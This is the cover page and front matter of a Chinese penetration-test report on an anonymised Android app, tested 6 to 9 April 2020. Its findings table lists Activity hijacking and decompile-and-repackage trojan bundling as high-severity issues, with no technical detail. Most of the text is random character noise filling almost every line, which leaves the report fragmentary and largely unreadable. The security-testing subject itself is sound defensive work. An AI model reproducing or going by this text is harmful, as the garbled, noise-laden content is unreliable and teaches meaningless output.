! M8 _5 O I! O5 v8 F
' {0 l2 B7 \7 ^ 0 n- \" r+ C& j: d5 B
7 a7 d' m) x2 J! i; F0 ?
! I2 G0 T, {; P0 @3 r+ J# f, h3 |
" G' R% O0 Y( e9 K! c! k
: J% s$ w+ k7 G& d' p
, O- n5 v! F# J
+ f1 A: k- o; d4 R. a3 m
- M* B S8 q# v% {( W# E( A# M
$ M0 p) M( k8 H' o T* E% B$ r( u0 j/ A7 m5 \
文档编号:
6 P9 k" j+ F- z; N: l0 t" j# ~9 e* Z, H0 `9 R7 h5 L
3 P! u, l, }5 m! a
7 t7 x9 ]5 U- N% L+ C
) m! h O2 U: X, A. d8 L: N3 S( X0 U/ k; P
+ C1 o6 f* q+ z- N
1 i, q! _+ H, l4 ~2 P; X
! W+ S0 S6 Y2 e" W$ Y
- w L' ~3 `9 U% Z
' {) ^" a, F- r9 p. I* k; A& O* Z, ^
& P! i/ L8 v1 I- S, I! [" J* J
! E# _, S I5 x, K+ E
. J) H5 s5 z; m" G* X1 w* J
( d: c4 _4 o6 {# W8 C# Y! {1 s% S6 J1 x7 Y. h
: H& Q$ w; ?% |7 K
5 I/ \8 g3 S" S0 E9 @- g
+ `" k4 M H8 c0 C) O
) U( N6 m% u+ a4 d2 \6 A7 s/ d
; J2 ?! L% @2 U( [; q+ s0 | G; J
) d; ^( k |6 ?9 |: S
% P. J6 p/ h* c w/ K
& O; V& s6 X. n. ? & U2 Q8 s& d. ~, P% S9 r# _+ K
# ]0 o1 [7 h8 V" J8 \
- z3 F$ s: b0 H/ c( ]2 u- A3 o" P
; Q, t: G. q7 T* r) ]
0 d3 J5 b" O) X! O5 E
k0 \& M! N% P) D5 J6 R' b4 a2 l
& Q2 L( q2 T" ?9 ^$ x
0 T9 L/ S; p9 t
8 I6 O& T! Z3 s) P , A4 O/ [' ^! d; E
' S: w% v0 S0 [; b9 ]6 u& a# Q1 m 某某某APP渗透测试 7 I3 v. b1 G& |5 C" k
2 D9 Y* y5 A6 ^/ e& h9 G
& Q- G% E& [% C+ u/ B5 H
7 g7 t& a# d* \( N- { 4 ~& U$ U ^5 Q: n
+ D' W( i, f. D/ A4 W
( z3 o- s+ A1 f& h+ M4 [0 e( Z5 @# d5 E4 V c1 v, P
; _0 r6 f, p. q S
. P! r& _3 Y" v- M
) s) I; z! O0 J+ s& ^& o( ~& R4 ?% n) |% f6 w& ~- p7 V
) a5 w8 Y! [6 T9 r' S6 r- a6 J
- _2 B- i* {5 @8 o* V5 q: X: w
1 D: K( f# }0 D1 C5 i# _+ V
) c7 O+ }) E# O( K( @, Z, F
$ ]+ v. w1 i; V3 \# p0 Y3 Y2 S
* Q0 F5 G& k2 v/ e: E" g8 M
, {% k* l8 ^, p ~5 _8 V! G9 r" Z9 I; R! Z U8 {1 A
. W6 A# H: c( H2 {- d I9 j& \- k. Y3 @& O$ u+ d3 M
, s+ m6 w* C( z$ N4 }0 a% \ \$ c3 L8 l
" ^' X+ u/ \2 y) d& j* S
; n: p: \% h" e& q2 ^& b3 p9 G; Z5 L
; g( K( s8 @! C* W } x' r
; K! m1 n, }- @# ?. j% p. V
, r6 x# ?* }- ^* O: x# \/ h6 e% x& q7 k8 T! U5 C
技 术 报 告 3 X0 y; C/ Z2 c/ t% O7 v, q/ c
9 K) D2 A _" I; \8 e5 n4 I
+ R) H/ Q' W! y$ u* T# m8 J$ H9 ^8 x6 o
; E- z: i0 c0 g9 i
C& Z/ V( s4 d/ t# y K2 H / Y; U7 G. o. r+ R
* |7 M( o3 L% H& c0 @
2 w# l4 g9 j7 s- h& y% J ]% T* z
Q1 F1 i C) c: d: O1 N: |1 @
' R: M. {) |4 T" O9 a" |8 G e% r5 X0 s5 ^+ _" W
' H# H- m- [. F; h
7 d" x J) i6 x3 e7 g
* H1 B: I8 V! Q& \. w& w2 E
! p# \6 v+ H+ a8 m: P$ y
4 |0 {. \2 o9 a: N- T
( Z1 }' c( E+ h1 ? 2 P4 P P P3 _5 R9 l! `# l7 i N n# g
2 H" @0 G, K1 c, l. T4 r7 D: J
9 J( y$ ~- [9 S# w$ Z; Y0 I0 w. P$ C3 ?) y
' C' o; D( O y1 y9 j
; D* `$ n5 T6 W6 J0 G# a. E- B. l 3 N; l8 B" D2 x$ B1 T# J
# j5 u4 Q" z B1 R* f+ y$ N
5 e0 v& |( } O
- Y7 l+ h& y6 [" w' {- J+ E& U* e, R
, ~, ?. U# m& w1 b7 b
% |2 X. b4 d) c6 B1 z
9 H3 ?2 n2 a' f
, @! w. m: H$ a3 Z C" W
: y( A2 s) Q4 |: {1 u/ T# j5 K) s# R* p7 p# l
4 F* |1 {& {6 k/ ^
! K; K+ G; k8 D5 r/ O$ p- l( M/ b' P
$ G/ R8 i% f+ g7 m; W/ D) E& m3 b% J+ d$ }: h- `3 }3 U' ?! a
2 U, r: |1 F) r5 H
: z- Y' C% p9 O
8 C% T2 c9 B9 H8 n* M" e& s% U% M! x$ z" @" a7 p( j# H
! D5 B s+ U: t& R7 o" ?7 ~
0 G# G5 @0 {8 E3 }1 u
6 ^( g) Y8 a2 c) v& X3 h4 x; E6 _" k: H" G6 L! @3 ^: F' E9 f
9 w; ^* z, Q, n# w' E: m' z
' M5 j3 O- b- `/ P1 M
8 a& E+ Z% ?3 T6 @$ I9 B2 |
' l0 e& B% a/ z6 Q
' N' k0 J8 O& y; l- k
- |% |# G" m! r& D / q! F5 n6 d2 c
, B& s) S. X- H) \7 g. u# |
+ \# j4 @- P9 y7 k1 X; W9 ~$ K5 X( ]% u0 k5 Q: y
7 I1 I$ Y; Z y5 k2 v E0 F4 S' E; `( j
2 u8 B- ^0 L7 ]: h& z
0 z6 k; a: o; I" I5 ]% v5 E
. ~. q! m. a( ?; J7 ]7 e
6 N+ U1 _& q, j7 X: @
! B3 v' g( j) k/ r/ V4 r2 \
) K( H. }, w; h* }# M& Q2 C W
. |1 k, m# v7 z/ N
: {2 \1 o5 z9 h8 | " Y: r+ @7 {" Y0 {" g5 T6 ]
3 i- W: ~3 Q9 D8 N7 ]
9 O5 `# a ]1 B- w4 W( I9 ^( H2 z8 ]& r. x, N3 ~: @
/ Q0 w3 O3 A$ a, S0 c
1 D+ C2 e. }& n- z; \
7 ]' F2 o* t* m) Y0 Z w4 _. [1 U1 R1 z" J
4 l+ w" q/ J- O2 [. P- F6 ^; K z
( w, Z$ h* L T9 m
6 w% h/ S9 @6 P5 G9 r# W" N* z4 q' Q
! n- G) g" e* |' F8 U( ^4 r1 `& J7 I2 K1 c1 u) m
) D: N+ h7 V/ Y% U' k' H# Z1 u( G( ?
" |( }: U* t; l& E+ _- V `+ F5 q8 |2 L+ V
% c/ p' B2 [ j- K4 L
% V6 c5 Q* @8 |8 l7 q8 }. I: ?
) Q; C4 `* e/ e8 |' O
" B( D: t8 [% B/ J6 t; @ 1 j& W( h0 W, T9 G3 p! B2 v
2 n, k4 E: V [" t2 M8 H5 k5 b& y
2 J$ \5 x* g2 }; A; h l' D8 ~. m! ]3 V* `( S
r9 [* Z4 o7 g. U( Z; G9 ?9 i* F$ J9 c' C' U5 i1 U. | z
: A% A) l% s+ k' y7 ?; D( O* l
5 Z8 }8 t0 Q% ~+ \! ] V 4 z0 S( J7 ^, t9 ~8 Y
% \7 U$ {6 \" b4 d6 `+ p
8 s% r, P0 V0 c5 ~5 R
8 X/ ^% [/ ~) J+ T2 b+ }/ o
: p& [9 \* X+ x4 O$ t/ `1 x
) h' N# H" Z U3 X6 `* E$ A D
+ f( F4 H5 n6 f9 k" R" N p1 g, B' _- S* q0 v- s# l. V1 R
3 D: W1 Q0 z2 \1 A L( I
5 {0 i/ t8 x. i& {! |
( V. [2 U+ Q8 }, f' b; h
$ N: c" \- a ~
4 Q( R* t& g3 O4 j0 V9 i; l
; w) g/ [$ j9 k6 h D
{0 p- V& S! m( f% N% [
' r( ?2 ] Y1 q3 J( ~! @
" x9 r3 C9 ?2 [+ t- w* p& l5 t9 O; [$ u+ y$ n1 ~) m$ E5 u
二〇二〇年
; y' o: V8 U+ Q/ \' R' f6 k; _9 l7 o- ]
) N1 S8 o1 o7 j3 e
4 _ E1 @0 t: I- F" k
! c' ^( U7 F1 s3 L
; S5 \. `4 h3 S( P! B: a
" S/ `$ B" G; F- f
$ r; l0 k( A+ t! E- q# H, z$ U ! C9 k0 z) n$ d" G( n; ~% y7 y
+ A$ B# ^) W. K) ], L
- L* B6 W7 S( u! h" g5 u b4 Y7 W/ G, E/ S4 V( V+ g7 m$ m+ I& v, r/ w
! a4 t2 C+ b/ h# T
- k3 L& I1 e: [0 i6 v
; h4 W, k8 |2 d2 n' J( `! z) x& d$ }" E3 e; y. ~' |5 Q c
9 _; K- Z8 k. j" U4 I! j6 [. `5 K
8 b' j* H7 v5 p: P1 B & @5 P( ?8 e" Z8 K6 u
# ^1 Y1 W' T/ r
! ?1 u$ {, k+ s" E: G# ]8 w
* b* [& s9 j# m% Z u
目 录
; F5 v( V0 ?$ k+ Y, f4 r
# ~1 e# t7 o% ^/ m/ C
+ L' {7 C0 ]2 _% R1 `2 C6 y9 m( v, z$ [2 Z( l
7 F! k. E0 E9 B$ H+ c
% S" P1 S' F7 g
" ]# n) F: i7 e. f! u1 Y& i* K0 l N6 S) i& s
3 q( c& w7 `; ^6 @7 Q+ R7 G1 g3 C M/ ^& F( e
& J, P2 d3 ^" o4 M4 w5 A
! K, _/ a" O) I T0 y& J, j
% {5 {' H' Z8 q2 f! |# u+ K1 |
2 z0 v( \" E( L4 K; ?3 B
1 概述... 3
" ~3 O1 a! \& z5 L2 F8 C0 ?! ?! U/ S/ K; V
& M" J6 n& e6 W) B7 R
! Q. f! G% J% S+ L4 v7 p. N 1 h6 \7 D$ I" G' i, v, g2 j6 z0 X" \
# r6 o0 N$ j) Q" k+ k& P 1.2测试时间... 3
5 Z7 }. k8 z2 r7 [$ q# [1 [! G- `& i0 I
. E ?6 I3 g6 }( P* }
/ P1 u! _; U$ o: m. L5 a* N
" X# O, Z" A, P3 A+ V2 ^
, v/ W- F4 E2 y# K. [9 K$ \ 1.3测试对象... 3
# [) f# \, u+ p8 g; w8 T! }2 y+ f7 t3 @: G4 c& d5 C
7 K1 j% V5 B; [; F
k7 W4 x- N2 j' o, \
# u* O, |7 v- W/ K- ~ v: v
, I" d) @1 a# I8 W8 B
1.4测试结果... 3
# J; e% _0 a" Z v# Z; c9 X- T) S% ?, ?7 O# y2 s2 U* }
3 ~# s: u9 `8 b) x- w# ~
1 E. H' i% J9 l
- @: H7 B. v3 T2 O
$ t( r F$ E* m ? 2 检测结果... 4 " p; ?3 E: q9 F- ^( K1 s
3 K: W2 Z* K9 q& d, t
6 w: O4 w$ B- B. |: x3 s- G4 I. w' l6 S) Q( G
( q) {% |: I* w" f; {( a
3 G m$ T8 J: r4 T. T 2.1 某某某... 4
1 W! N- d- F8 n4 C& {
: ~2 N& t7 w+ \+ \
6 k" h t7 q6 \% n0 x7 @
0 x- T, C% `$ |! b
4 y" I, y+ @ i4 @: ?$ ?' h
* w: B& J/ A+ J$ ?& y4 T 2.1.1检测目标... 4 2 ?" `/ f* m! o2 L3 H
1 U/ G6 j) A: ^) e
# b! F D; j! T- Q. S! q
, ^' x$ L) [( k$ o/ u8 B8 o
2 Z+ g6 H0 s; L0 n6 D
: C7 J! Y( `) f( y, N, | 2.1.2检测结果... 4 0 u4 y6 U1 L/ \6 \6 F8 P) `
9 ~+ v! U7 ^$ J
h5 I: k# v( Y, W
6 Z1 B T- R( ` I4 ?, I* A0 s) [
( B+ q8 D6 s I( m1 D" e; K$ s
/ w' \6 o; l" P0 L, _% N 2.1.2.1. 4
9 r* p2 `$ `1 M1 J3 C4 U" D" s7 [/ a3 \
$ i' h7 k' |" G( k4 Z# S: b7 R0 A' U/ j: W2 H% r1 y
/ x% m( r8 h7 g4 `7 i: \7 D7 e
+ o* \$ z+ h$ ~ W
2.1.2.2. 6 3 l# o" W0 r( r' p9 y& ~8 g
1 D( }/ w2 h- p) \
$ f8 s) g+ X9 D N& W, n6 ~
: }! x' U4 @: ]* X( V6 X% u2 L6 ? ; F6 }% p& e# y, I0 `9 ]9 B
# ^+ w: E& s# S2 @ r
" x$ r7 Z2 g0 _& n" X
: Z8 J; R2 g' a9 y
% n& i4 P; r) z" u, J
! P) k( c. g1 k# ^/ G
3 Q& b6 @+ C4 ]! L' ?5 d- w3 ?, z% C D4 J5 U3 q
3 N& o, M" U8 K6 i7 B/ v7 f/ Z0 w( j* g8 ?$ w8 s' k4 r' |$ l0 g5 s
: H0 g- |( n0 t. E& m$ Z: r( l# ?( x
" J! E; ^/ L8 _
0 ?. k( e- E2 D3 L0 _; I( W, R* i1 _! G f% U4 _5 I( i2 C0 g+ ?
4 F" y4 X* I0 ]' j
' {0 b% c; S+ w) ?- k6 I5 A, E 1 概述
7 i' y; P. A& V9 X+ {& C$ r
5 o4 l7 v5 F0 p: G; D
! J) h0 \: }3 s5 ~2 c1 @4 Z* P
4 x$ q2 p3 m, C
- C1 I6 }$ b1 {9 P! U4 ~- ^$ U! B, y+ L; Q' S* U
1.2测试时间 ! z" A8 c7 Q7 o# t! M6 p
# m! s# F' _" Y
* z& J5 ]# D4 J, [
4 \( X) v! G: l4 u4 b
( m& n4 F% O8 L U/ a/ c5 f
: b: t: ]: n# j0 O8 S+ _ 2 t; h. y4 [- P7 ^9 A9 U6 D
8 `6 g) e( p- g6 X5 V
0 z" b7 j) ]' O
* u8 q" |" s7 q/ D! V* h' U |
+ R) @0 P! m, c5 X" q/ n/ T& O3 x% i( O/ n# B
* |7 M) C: `( m* s! l. c% {7 x* N6 {
" K3 E" C0 Z# _ n' j/ r5 O
渗透测试时间 & D& z8 D& V" |( g- ^
) C B* e; q% \( V* q. j# |+ A
" d, J |' x; p8 p1 r c# L! S6 [3 M* Y' f
| 3 H9 M( `9 O0 @5 g7 F8 T! Y C5 a
( C8 ~' e6 v/ C2 [8 B
7 h6 X& x( u; [9 v g _2 L( s
" x2 ~# E; C9 t% g1 A
; b" x7 j) [; n" e: g0 i$ i! F4 w1 D
|
- @9 L% b4 P# W6 E9 |* t# W# x4 p7 ]# P4 K" a* O7 k! t/ Q
: Q$ v a. d. w; [$ `4 A" |3 s; J4 H9 }/ _9 d) {/ R) l; ?" N
起始时间 % _- l& Q* }, ]7 k1 \" ?: D8 a; W$ j
+ i4 C3 ~7 f3 B4 k& `/ ]1 Z) S5 Q
2 T, | j K, ?
" j3 M1 R' W, t7 h$ u' [ | 2 U" N* q, W$ ^2 ]' c
3 L! V% v$ d y% G# k
: k+ n+ b, D# t" o3 |
" C! |' Y; C# U. Y
8 z8 w1 F }$ [0 W V0 T* _6 [1 \8 L# {2 s- S3 I
2020年4月6日
" T+ U, K$ P! a3 D7 z$ S9 o: g8 T6 z u6 b
$ T, E7 {: C2 |" y$ w" n; y8 B
2 M( n8 A; X$ y. P! V; N; C/ E
| 6 f$ W) [ E$ h2 ~. E
, k/ k1 `4 @8 N. F
2 |* _6 g" D. k' {
7 ] s+ b O7 D: A ( O/ i9 _3 Q q. C2 \2 D
: s- @ G4 F2 D | 3 ` }; T0 t+ Y4 u% k+ J5 T
; J+ t+ C( n5 C ? h" C) c- T2 Q$ E/ f
; v6 z6 x) @( v2 ]4 h
结束时间 ' E3 x$ `# \( Y
6 l5 }& n) p4 }" s, w7 w5 m0 q0 h
1 U6 U6 E$ G* Z# I7 d! Y. o$ c& B1 c1 |2 e5 H
|
! i- i* P4 Z* Q3 c
" Q- b- H, j3 a2 r1 e2 R
4 P( q }$ X# a: r3 {# J& L2 W2 x" Y# F7 S+ |( x+ u/ z
) p* v. x* j, h
3 q+ x& i, G: B9 u; J 2020年4月9日
, ?2 k/ b/ S$ ~8 ?/ l
/ Z# _! s# z0 n$ v
1 h$ S' K/ H% t5 Z! T0 ^1 F+ K& r+ N! {0 W1 \9 @7 w$ ]* ]4 s, Z
| & ^3 v. E) W, G
0 t/ _- _& H2 y
' z! {$ n, c' H; j! ]" ?% A
' z" ~( C, h& H! X 6 z7 `" t0 { d7 f1 G
: Q$ \4 D( [1 a- E
" p8 o4 x9 k1 g; v$ E% p( @* `; S; }! y2 R7 P Y6 J; \
- |3 I5 S; R7 h( l
) l* l. u& F( ?0 a 1.3测试对象 ! {8 Z. c0 E* e0 k6 r
$ r, i+ x) g0 `$ t1 a J: i! s5 N
5 z9 P& h+ D, L+ H( o7 p" f2 F! m$ X3 Q- ?# ?3 q, u' L3 O
! g0 L& L& l4 y0 A
% k- x# Q, }; u1 [/ F# B7 l) u
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / Y, b C |1 x/ v# q% x$ ]
V4 \/ r- S. ~0 L
% M) _ a% e7 N7 b& |7 J) O
8 G: H. ?. H5 h, f
/ h0 @7 r7 E% y$ |2 q6 _3 ?( F) H8 I8 b/ D& \6 e7 c( k/ H1 ]
表1-1 检测对象
$ r% b& ?& s: ^! f& N* d6 L% X3 N9 m% a) t, W) W Z
1 n4 S7 s: P/ k0 J& \$ ^7 [* ^3 M8 f+ S) K. U1 n, ~
* w$ V6 k6 ?& H" X8 g# V
- `8 S8 d1 U2 r1 p
$ j0 l1 ?( s B6 B; d5 O3 `
- L# ^3 ]# }3 j* I 1 x1 J6 d0 ]: ~4 `6 s( J
, \( m. W O7 G! s" [) r9 H7 V |
2 D. k5 `. c1 p% Z5 j( Q6 j# w& L& L5 M+ T
8 ]( w6 X; D1 p
. P2 B/ x2 t; A4 i, U, o 序号
6 P& M/ S) L m
* Y3 K5 e s8 H4 g1 w6 v
- M; y' m% Q' Z2 V2 T
: N3 [' w" [/ e8 y |
! Z! I1 ~, f" [( ?& E% b5 S+ b) z# a8 @7 }: X
: Y8 I9 U7 |0 I* p' z: c
- H, A8 E& f# f- A
' k+ g8 _5 y! S
' u2 i/ a5 Y5 g0 Z 测试对象 5 H# J5 k9 x! K) A& l% l
4 N8 F J; c6 t- Q$ c4 G
$ [' n" X p6 j' c; @9 m# v- m; t0 i! [# A0 H' w% G2 C+ _
| ! U$ ?0 n" o7 T+ _2 [; `0 A
* M* g2 I" H( u5 R% R# T7 ]/ N; c T
& W& q; A/ P0 M* ~& _4 M! j9 y$ i* }5 X, C2 F3 j
$ E. i! y: f! M+ w: [, X n; k2 l9 n$ f* k; l
测试地址 ( R4 o; [/ W+ x+ P7 C: W9 E
. M- A1 f, Y5 N2 V
- W& y7 G& ?' G; [5 [* G
4 a5 v0 ~) C6 y5 T |
7 V" p$ J8 ^; X1 c4 x1 l: i& P7 Q% g
; x3 L ~# x+ L: A
6 H* m& P" _2 J& b3 r
! N' [$ g) q+ H& @$ U
1 U/ x& m4 z1 R) o 安全漏洞
1 q E8 E4 u+ b8 @7 l2 C7 K& o Q# e7 d8 n3 x, h
4 u6 r% c C* B$ b) H
8 j8 J& E2 `" h+ U+ n | J. z7 K2 t1 w8 d/ c7 ], E; ^
4 Z: k1 x- o5 h& p; S
2 Z h" M* v! v& ? i
' s" V3 s: \, x, R5 V( b$ j
" X1 B3 Y6 d" t1 ]# [7 F. W4 T8 P. K8 f5 R& C- c% M
| ; m4 o* I1 J! K4 |: d- X' ]
7 `) W" @9 M" i7 H. l; Y. u( R9 c, W* q+ s
% m2 c D3 q1 X9 l( _! W
4 ~8 s1 J4 |0 ]- N 1 6 e* y1 ~6 R( Z' Y2 R1 _9 B
# G( U- p4 @, `# R ' e0 M* \# b! c6 A
; [) v: T! C9 `9 P. g
|
X ?" J: j' c% p
! R8 b5 Q7 f4 m) a5 h
( h& _/ l& @- C2 A# a7 _+ s% h5 ^! [/ R7 c! e, a: j; D
1 ^* T" c: ^% }2 r2 H5 n' |! x* M! t
某某某安卓APP 9 ?1 H3 G5 X7 w
: j+ G* v) f$ \) N9 g) L4 ^ / y# o7 H q6 K' c$ n) a. }* l
1 U0 D1 i! ^" r |
o' d6 @+ i# k0 N4 D; z2 v3 y! [2 g4 i2 W+ j
" }+ y% w9 R' e- d$ ?( p
) X1 C- f5 h( p . b4 s( x1 g& k) b( x- |& n; ?
9 M# v% p7 l9 ?2 \
' u1 M5 n- P P/ R3 p4 `$ x3 _$ d# k s! E/ T, F
J% s4 s& `) n0 v; k
/ J9 x! P2 r* e$ u2 V! ?; N | 6 O; Y" d( S- T" Z' U1 o1 X
, K* F6 ~' U9 x1 z6 M4 O2 M* d
" C3 R- t* s' I7 a# a* [* C0 e
! u+ }2 w5 {% U2 J% c/ B+ y, E; ^9 i . Q" ^2 o$ w7 N0 t3 q h( m3 Y
! ^5 F' c* p7 m- g 2
( {9 p- d: l; f g7 [
7 \- q% N3 P W" c& h8 b
/ g3 g( z6 N+ o% d5 E5 W, a9 W* i" O" a3 c
| 5 E9 L: C0 h5 p/ x
# x: j; p. O- n; J
( f ~; R5 ^3 u
: g U8 K) [2 c8 A* L+ [, w: s& x+ u
4 S8 d% j2 q( ?* l1 x& q
" d. k+ w) F% j; o
2 K, Q3 \1 d0 b Q4 E |5 t! l3 H
4 R) J: U8 J3 s I0 ]) H ) L6 ]2 _/ N7 T* k J
0 [ ?" f# e. y$ L
1.4测试结果
4 Q( `2 G3 v0 T Y. W. y( W# M/ V
0 _+ I% M! F) W- p# Z% W4 x
2 Y, u* g: C( P) n/ n0 \4 q
- j" V' V1 b6 j* r* I9 \1 t7 K ! p# c& H3 L% |9 Z( T* N9 C
* @) a! J4 c$ ]9 e
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: $ s: |5 }! X& d, Q
- j' I3 ^2 S1 z# U' x% _# |9 _
, I! R/ a3 f1 I% d9 B; C0 R
' ?/ o4 V+ j8 p8 o
+ u6 v2 f. i J; Q8 j3 n" u
+ g) l/ }% o4 C: E# U
8 D8 m0 m) x& N5 F1 \) o& f, e% T# X& c# X
* o# m! R8 _ L6 X+ a- I
" Q7 o# @5 e4 `6 E& p8 E* h
: ]0 V6 C9 i; J! \ g: B$ k/ H* w: L) x/ k8 [* ?" p% }: z
3 A3 c; b7 ~9 d8 ]6 {# U3 Y/ H$ W6 y3 u( s! ~4 f7 G+ X2 f
- m' M" m# P4 k7 S3 V' z
4 J' x! r& P: c2 W) `$ L- l6 K
3 q$ R P5 i- |9 }
) ~3 X4 p) V; q1 b |
# x' F! M" u& N; `3 o# c3 Y* n, K$ ]8 H
1 d/ `9 A5 C! _. E- U& Z% N8 n
) {6 C& c. r3 @# ]9 `4 M
序号
( x: F0 C' ]3 a d9 Q; C2 Q
8 j# |- Y( P2 n# Y
3 j$ w4 u1 v$ ]0 D& o# N q+ P; I2 i7 r, V8 i8 N; t4 S6 x4 I
| ! _8 r* J" c; i ?3 d, p' k
* h# o4 z( p& }7 v$ e2 E0 r
0 E; K0 X! B% f& D: e
, e4 |$ j- H! H X1 ]% M* B9 g; R
- `) T ^6 D4 h1 g
: A# N. L. ?% H& a T' o3 a3 j 系统名称
4 X" b8 a s: V C N, G2 O8 u, o, h# J5 d3 _: ?
/ ~9 t( F: H" E9 g# P' G
, b8 C: h* g5 `0 l |
( l; O5 _- c0 N# r" S: }; f
6 T9 d) `0 a7 F1 Q0 y; o% Y
; G" X6 z4 K; E9 a/ \) _" t& \
, [% u- g9 l9 @# F8 M; y3 ? ' t- V2 }& M7 H
* v( I9 D: f8 j) V0 ^/ Q 漏洞名称 $ N: l9 q# k F. m! m) l. K* X
e# R/ s V9 |
, s( t0 `' s1 H. r
# `/ f8 H( l; s: v, Z9 w | . C( f* w" Q7 ~' n# r
1 X% j1 w/ K' U8 c
: @: q/ ]* h1 ^( y6 e4 S s) y
: o6 N+ N: e, ^6 p- m# R3 o # a b8 S/ q2 P' n# O
, Q8 H0 y n+ R' U 漏洞危害
1 C" d1 z; z2 S0 ^3 Z2 b! R$ m$ R2 U5 g5 r
; P5 I, [% x7 q+ x: k5 ]. T% f8 |: J+ D+ P# v. \
| ; Q9 } L1 ]% n6 O0 }
) G6 }6 Y2 L0 A( H* o% Q & d! e! ]' B6 K2 c. v) R- ~
# ?8 m7 C! Q- T& S. M. M0 Y2 n
# \3 p) N( h$ ]6 x
) W. o" ?7 X F& b6 y 修复结果
& r" Z: c7 m. q6 D4 r( O: [1 h
% _+ M& u! p# D
: X; C( E1 p- K; N$ N! m
6 F1 n6 C% m" U# ]* G: ^# ~ |
0 W# L% [/ Z: T3 O/ A6 t8 b* f( j
8 L. C9 l D' }; o/ j* M9 e( C: I
( \: T/ p( ~( X1 ~* h
6 o$ k+ ~: b4 }4 ^4 V! ]
8 x7 p& M0 l S: I: U! X
3 r% g& ?" f, c
| & M& q+ J5 e$ H' j
# X& E) ~5 C0 ]
$ w/ @/ |; X& K: F5 T' |( J
3 m) V( h: F1 Q8 g 1
) D/ v* `4 e5 @
: e0 @; ?0 H: q; Z% \1 J 1 B8 p7 H( x: H1 S$ Z3 F' y
/ K! h5 [+ S S2 c | - T( `0 ~) D8 e4 c" X2 D7 z6 Y
; |+ j. P4 y' P; P
6 ]. x. |% D1 r `+ U4 y
( e2 I( b: j6 o: k4 ?, V2 u5 s $ C% u$ p6 z4 v) q- j
* _7 ~6 C7 L; d 某某某某某某APP . k! \, Y( S, K' x
4 O# u8 Y) |/ t% Y; K4 o0 R
8 T) x, ^& [- l3 f$ R2 b
D8 `5 `) p; d |
. A, s# e1 h# T9 Y# B9 p; K+ u) i% q5 v$ z: D2 v
+ Q3 N8 L- P/ K; h; d( I" d
@8 i. @; Q3 r I! c4 h* m6 R 8 h: ~' a d' L$ u. y1 [9 R
) d6 m0 y3 F! G" }$ S7 X/ Q1 m% e Activity 劫持
) ~% h; C3 o, \( \# M% w! U# t3 W r) o- ^4 w$ X9 c7 a
% j9 G: {( n# k/ h0 N
' D. o* G6 [# G# H
. W2 S5 K |+ H0 ~
$ U: ?& u1 C- V( c1 H2 R s, F+ I0 B" f9 G% m, z$ w! o
5 c( ?4 ^; I1 ^0 z) Y
) w: e1 x, _) B9 S. l: q! `. n% x# n( `* L4 {3 n' ^: P
| " H# l0 f1 F" G! [$ f
3 l- G9 b+ v2 ]- k" C$ a . P' F; R5 L% Z8 w* m* y. O
0 \8 A6 W5 T7 Z' ?
, e6 d9 F6 X- n$ |% k/ q* k' Q4 |. N+ Z7 l9 i
高
1 d' o$ D9 H3 i4 p$ N
l& e2 t1 H% l# r5 T$ E4 T A) J4 l6 X9 L Y8 }6 A/ |
( y6 p. l' q% ^( I% D
|
, |$ O+ j. `0 D' G2 v( p4 t G" c; s5 X) t
0 g% N# Y2 ~4 `3 }5 g, i* c8 X1 E) Y. M/ A
6 L' ~9 L. H* s1 \8 a8 f( m. [% c
8 w v% `+ u- X% `, c 8 E9 [7 b e r( h
6 ^7 a& |6 X! X- x& y5 I
. U- C, M3 C( J, x& @
4 V1 _5 n* i; V' U |
S6 H6 ?0 h/ B6 E2 k+ t i7 [( w7 m
2 T- S, U( I1 S/ C! G: A% X
" c$ v3 \% L4 y0 ~# w9 T d
6 o4 p. c3 F# c3 e# z
9 |5 V2 q' g9 y7 ~0 E9 h |
$ e$ h: z3 o) R) ~6 b* d1 H9 h ? x, j9 P# a* ~
+ M" D( v' v1 e: I" `
: W+ J# S3 k7 a' V) {: R0 R
2
: t& m1 ]1 k/ N( H1 E2 C& P+ s) J/ ] B- u1 r
+ |4 B P* _" o5 J5 Z5 ^5 c
# [5 }. P, i2 l/ b2 H8 Q H | ; K9 n& _: W: }* ^ l
7 y1 ^! r7 |% Z: i% \4 `
6 R. D) z) t2 X) \9 K4 |
- _$ G3 C2 k) {2 A& n
& w2 h9 H' R& S7 T. N4 z9 ^: h- U) n# E2 I' ]' [% D
某某某某某某APP 5 p \. D8 `8 p5 q, j$ u+ g8 f
/ F v& h& O7 W) ~* O/ Y
0 w9 W# J" i* S: E/ y; `: K! v8 j; D# J: @; I+ ?" @7 ^) ^! |9 r
|
% q5 v2 T; C+ y1 v2 n" y+ B! q3 f& K1 I
8 s! m: G5 l9 x+ G7 u7 r$ `
) B J _2 q0 Q4 W- w, l2 X8 g0 l4 C
- @$ F1 Z: M4 m5 t8 j3 B% e7 }* e. I# e2 P4 x
反编译二次打包捆绑木马、篡改APP代码 ) \! [7 g3 I( r4 _$ ]+ [ ^
8 O5 H3 n3 G' Q/ C* b* c
3 U% S" n! w" k' ~% x: o" W' K4 s$ B% b
| " H. ^2 @9 Y- ]1 U
7 o# l5 M: W4 G% t: I8 F) x$ R
$ }6 X3 W" O: u& _/ M" c1 z9 {
) S' p& ]3 ]' \6 G# f! U/ g. k
Y9 X& x5 y2 j8 c% S* s p
+ n8 T* q* X8 {+ \! m9 W+ g5 [ 高 2 H& o0 K+ _# ]4 L9 r- I# K
8 R/ ?) x! Z, [5 Y - F$ F+ @2 _7 H' K
4 q# B" i* V3 O/ y* }+ f3 r
|
0 g; ~- u4 u/ @7 R! p" \6 V$ C9 o7 f) l. U4 T$ y" o
{0 ]* k+ h8 J" n
) }- Q1 [% G: O* ]* H
6 _8 G) E* A/ ~3 n7 O. |1 h# x5 _1 m: w. j$ Y) F+ ^" P9 k
0 i; i: I8 k1 _/ c) i& t, B6 a
1 |5 u' V* w0 ~6 U; i
, h- P4 A W x; U& u" @) t! y g) v3 T
| & a$ G) D; o: s
8 Z, m. m- f4 r0 P7 G% B5 c3 J
" Z! Z6 E; m. b ^% O' V, ]
i0 ^7 m6 m0 A, _5 `- C/ w
+ q% `5 m( X0 F
7 c" s f5 E# R4 k3 l0 ], Y, k5 E
( B5 i" j0 ?* h& r% O
) G! d: ]/ n5 u/ P. y 9 F; f. V- b# J( Z) q$ s+ C
6 I# \8 Q$ |8 f5 X& M4 ]3 @0 Z 5 Y9 @- q1 f! _( N- t% B
3 J7 ], {' V+ E% C# e( ?3 O
6 Y: A0 s, C' `
! z, e0 i, m! T0 e
